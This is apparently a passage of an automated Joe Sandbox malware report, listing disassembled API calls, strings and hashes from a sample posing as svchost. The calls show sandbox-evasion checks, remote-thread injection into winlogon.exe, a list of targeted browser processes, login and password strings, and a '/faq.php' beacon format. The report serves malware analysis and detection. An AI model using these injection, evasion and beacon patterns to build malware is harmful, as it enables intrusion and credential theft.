                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CA6A2C
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 02CA6A6A
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CA6AA6
                                                                                                                                                                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 02CA6ABB
                                                                                                                                                                                                              • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02CA6AD3
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000), ref: 02CA6AE2
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CA6AEF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA6B64
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA6B67
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA6B74
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA6B77
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000001,/faq.php,?,00000001,?,02CD96FC,00000001,00000000,00000000,/faq.php,?,00000001), ref: 02CA6BED
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 02CA6BF0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02CA6BFD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 02CA6C00
                                                                                                                                                                                                              • SetFileAttributesA.KERNEL32(?,00000000,00000000,00000001,00000000,/faq.php,?,00000001,?,?,00000001,00000000), ref: 02CA6C0F
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02CA6C1C
                                                                                                                                                                                                              • Sleep.KERNEL32(?,00000001,/faq.php,?,00000001,?,02CD96FC,00000001,00000000,00000000,/faq.php,?,00000001,?,02CD96FC,00000001), ref: 02CA6C61
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$FileProcess$AttributesDeleteFreeSleepTempValidatememset$AdminAllocCountInformationNamePathTickTimeUserZone_snprintf
                                                                                                                                                                                                              • String ID: %2b$/faq.php$id=%s&ver=4.1.2&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                              • RegQueryValueExA.KERNEL32(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00403A93
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00403A9F
                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                              • CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                              • strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                              • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\sand-box\), ref: 00403BBF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403BD1
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403BE3
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                              • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                              • API String ID: 1431998568-3499098167
                                                                                                                                                                                                              • Opcode ID: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                              • Instruction ID: bae6937ecf4d77d63e68da0d133f8e08c9265e2213eddde9df9132157c3c9a9d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A841B8B1944218ABDB20DB54CD89FDF7B7C9B84705F1440AAE704B61C0D779AB448F98

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExitThread$Startupsocket
                                                                                                                                                                                                              • String ID: login$pass
                                                                                                                                                                                                              • API String ID: 1705285421-2248183487
                                                                                                                                                                                                              • Opcode ID: 0dfd243983769156703f64627744f35ec7acf3266e33c8991ce96a385960b764
                                                                                                                                                                                                              • Instruction ID: 9df81b599355c341ab1bc18663c8d8b2592bc7e176aac3278e110aa146cefb22
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0dfd243983769156703f64627744f35ec7acf3266e33c8991ce96a385960b764
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 21519B35949301AFC310DF64D889B6ABBF5BB88765F808B0DF966C72C0E7709514CBA2

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02CA78B4
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: Process32First.KERNEL32(00000000,?), ref: 02CA78D9
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: GetCurrentProcessId.KERNEL32(?,00000000), ref: 02CA78FD
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02CA7917
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: EnterCriticalSection.KERNEL32(02CDFB80,?,00000000), ref: 02CA793B
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02CA7941
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02CA7948
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: LeaveCriticalSection.KERNEL32(02CDFB80,?,00000000), ref: 02CA7977
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: Process32Next.KERNEL32(00000000,00000128), ref: 02CA798B
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02CA79A5
                                                                                                                                                                                                                • Part of subcall function 02CA78A0: CloseHandle.KERNEL32(00000000,?,00000000), ref: 02CA79B6
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,000002F0), ref: 02CA7A34
                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02CA7A58
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CA7A82
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA7A94
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(02CDFB80), ref: 02CA7A9F
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(02CDFB80), ref: 02CA7AC4
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?), ref: 02CA7B2B
                                                                                                                                                                                                              • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 02CA7B4C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CA7B70
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA7B82
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(02CDFB80), ref: 02CA7B8D
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(02CDFB80), ref: 02CA7BB8
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02CA7C06
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(02CB5460,?,0000001C), ref: 02CA7C51
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(02CDFB80,?,?), ref: 02CA7C90
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000010), ref: 02CA7C9A
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 02CA7CA1
                                                                                                                                                                                                              • Sleep.KERNEL32(00000032), ref: 02CA7DB5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalProcessSection$Handle$EnterHeap$CloseInformationLeave$AllocOpenProcess32QueryTimesVirtual$CreateCurrentFirstNextSleepSnapshotToolhelp32
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 87146162-0
                                                                                                                                                                                                              • Opcode ID: 25e54bad8f244bcd8aee1b8d41fd38d02e0d3d31f6d357ea5f87370fd2d03b53
                                                                                                                                                                                                              • Instruction ID: 56f23cf807f7c7b40a9320cf70c9712494d88e7e7c8ec15c1b2a9fd0174efe98
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 25e54bad8f244bcd8aee1b8d41fd38d02e0d3d31f6d357ea5f87370fd2d03b53
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59C1E6B1A49351AFD320CF65C894A6FFBE8BB88B54F54891EF58AC7240D7709508CF92

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00401CF0: memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D27
                                                                                                                                                                                                                • Part of subcall function 00401CF0: GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                                • Part of subcall function 00401CF0: SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                                • Part of subcall function 00401CF0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                                • Part of subcall function 00401CF0: FindCloseChangeNotification.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,00000000,?,7604DB30,00402F58,winlogon.exe), ref: 0040169D
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,7604DB30,00402F58,winlogon.exe), ref: 004016BC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004016DB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004016F1
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 004016FD
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401718
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401728
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040176F
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401791
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004017BD
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 004017D8
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 004017F3
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00401801
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,?,00406400,00053200,?), ref: 00401834
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401844
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401856
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000), ref: 0040186E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040187F
                                                                                                                                                                                                              • RtlCreateUserThread.NTDLL ref: 004018A0
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000), ref: 004018BC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheChangeCurrentErrorFindFlushFreeInstructionLastNotificationOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                              • API String ID: 2373081918-3024904723
                                                                                                                                                                                                              • Opcode ID: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                              • Instruction ID: aea8cd550169bae8ca71061e7f9b66115ece3b9acf575b2a14c75ec5d6601f55
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1071A4B1A00315ABE7109F94DD89FAF77B8EF88701F158039FA01B72D1D7789A458768

                                                                                                                                                                                                              Control-flow Graph (graph not reproduced; first block 2cb4cc0-2cb4cd0)
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CB5680: memset.MSVCRT ref: 02CB56A6
                                                                                                                                                                                                                • Part of subcall function 02CB5680: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02CB56B7
                                                                                                                                                                                                                • Part of subcall function 02CB5680: GetLastError.KERNEL32 ref: 02CB56C0
                                                                                                                                                                                                                • Part of subcall function 02CB5680: SwitchToThread.KERNEL32 ref: 02CB56CF
                                                                                                                                                                                                                • Part of subcall function 02CB5680: CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02CB56D8
                                                                                                                                                                                                                • Part of subcall function 02CB5680: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CB56F8
                                                                                                                                                                                                                • Part of subcall function 02CB5680: CloseHandle.KERNEL32(00000000), ref: 02CB5709
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,00000000,00000000,?,?), ref: 02CB4CFF
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,?,?), ref: 02CB4D1E
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02CB4D3D
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02CB4D53
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 02CB4D5F
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02CB4D7A
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02CB4D8A
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 02CB4DC4
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,?,?), ref: 02CB4DE5
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 02CB4E11
                                                                                                                                                                                                              • memcpy.MSVCRT ref: 02CB4E29
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,?,00000000,00000000,00000004,?,?,00003000,00000004), ref: 02CB4E44
                                                                                                                                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,00003000,00000004), ref: 02CB4E52
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 02CB4E7A
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02CB4E8C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB4EA4
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB4EB5
                                                                                                                                                                                                              • RtlCreateUserThread.NTDLL ref: 02CB4ED6
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB4EF2
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB4F03
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CreateProcess$CloseInformationThreadVirtual$AddressAllocMemoryModuleProcSnapshotToolhelp32Write$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                              • API String ID: 2650560580-3024904723
                                                                                                                                                                                                              • Opcode ID: fcb1034bce2f79ddc82a04a8481c937f855251c4c755f856f8b32d90c8e3dcc5
                                                                                                                                                                                                              • Instruction ID: 3342db10144709d9bb5bb830aca68135c9826691a21b4a815ff7709318901b5c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fcb1034bce2f79ddc82a04a8481c937f855251c4c755f856f8b32d90c8e3dcc5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A361DF75A41205BFEB25CF64CC98FAAB7B8AF84B45F548509F905DB281D7B0DA00CB60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsNetworkAlive.SENSAPI(02C96E0D,00000000), ref: 02CA4F93
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CA4FA1
                                                                                                                                                                                                              • DnsFlushResolverCache.DNSAPI ref: 02CA4FAB
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA4FC8
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,74DF0F10), ref: 02CA4FE7
                                                                                                                                                                                                              • StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02CA5000
                                                                                                                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CA5013
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CA502C
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,74DF0F10), ref: 02CA5045
                                                                                                                                                                                                              • StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02CA5058
                                                                                                                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CA5065
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CheckConnectionInternetlstrcpynmemset$AdminAliveCacheFlushNetworkResolverUser
                                                                                                                                                                                                              • String ID: http://$www.bing.com$www.microsoft.com
                                                                                                                                                                                                              • API String ID: 1656757314-3977723178
                                                                                                                                                                                                              • Opcode ID: 94f9344a49f4a08dc55f006f980dd443af380683781b55ed51cae6c7532d4c01
                                                                                                                                                                                                              • Instruction ID: 704d724765befb81a3bfb38c4143875728d157600ead8b454dbf3169d3172a1e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94f9344a49f4a08dc55f006f980dd443af380683781b55ed51cae6c7532d4c01
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C721FBB6E843186BEB20D7A4AC41FCAB76C9B54755F400595F78CE60C0DAF0A6C48BD0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02CA78B4
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 02CA78D9
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000), ref: 02CA78FD
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex,?,?,00000000), ref: 02CA7917
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(02CDFB80,?,00000000), ref: 02CA793B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000010,?,00000000), ref: 02CA7941
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02CA7948
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(02CDFB80,?,00000000), ref: 02CA7977
                                                                                                                                                                                                                • Part of subcall function 02CB4880: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,74DF0F00,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB4895
                                                                                                                                                                                                                • Part of subcall function 02CB4880: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB48AC
                                                                                                                                                                                                                • Part of subcall function 02CB4880: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB48CA
                                                                                                                                                                                                                • Part of subcall function 02CB4880: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB48E2
                                                                                                                                                                                                                • Part of subcall function 02CB4880: GetHandleInformation.KERNEL32(?,00000000), ref: 02CB493B
                                                                                                                                                                                                                • Part of subcall function 02CB4880: FindCloseChangeNotification.KERNEL32(?), ref: 02CB494C
                                                                                                                                                                                                                • Part of subcall function 02CB4880: GetHandleInformation.KERNEL32(00000000,?), ref: 02CB495E
                                                                                                                                                                                                                • Part of subcall function 02CB4880: CloseHandle.KERNEL32(00000000), ref: 02CB496F
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 02CA798B
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,?,00000000), ref: 02CA79A5
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02CA79B6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex, xrefs: 02CA7912
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$InformationProcess$Close$CriticalHeapOpenProcess32SectionToken$AllocChangeCharCreateCurrentEnterFindFirstLeaveNextNotificationSnapshotToolhelp32Upper
                                                                                                                                                                                                              • String ID: iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.ex
                                                                                                                                                                                                              • API String ID: 3743708096-4199822264
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 02C979FC
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 02C97A0F
                                                                                                                                                                                                                • Part of subcall function 02CB4880: OpenProcess.KERNEL32(00000400,00000000,00000000,00000000,00000000,74DF0F00,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB4895
                                                                                                                                                                                                                • Part of subcall function 02CB4880: OpenProcessToken.ADVAPI32(00000000,00000018,?,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB48AC
                                                                                                                                                                                                                • Part of subcall function 02CB4880: GetTokenInformation.KERNELBASE(?,00000007(TokenIntegrityLevel),?,00000010,?,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB48CA
                                                                                                                                                                                                                • Part of subcall function 02CB4880: CharUpperA.USER32(?,?,?,?,?,?,?,?,?,02C97F74), ref: 02CB48E2
                                                                                                                                                                                                                • Part of subcall function 02CB4880: GetHandleInformation.KERNEL32(?,00000000), ref: 02CB493B
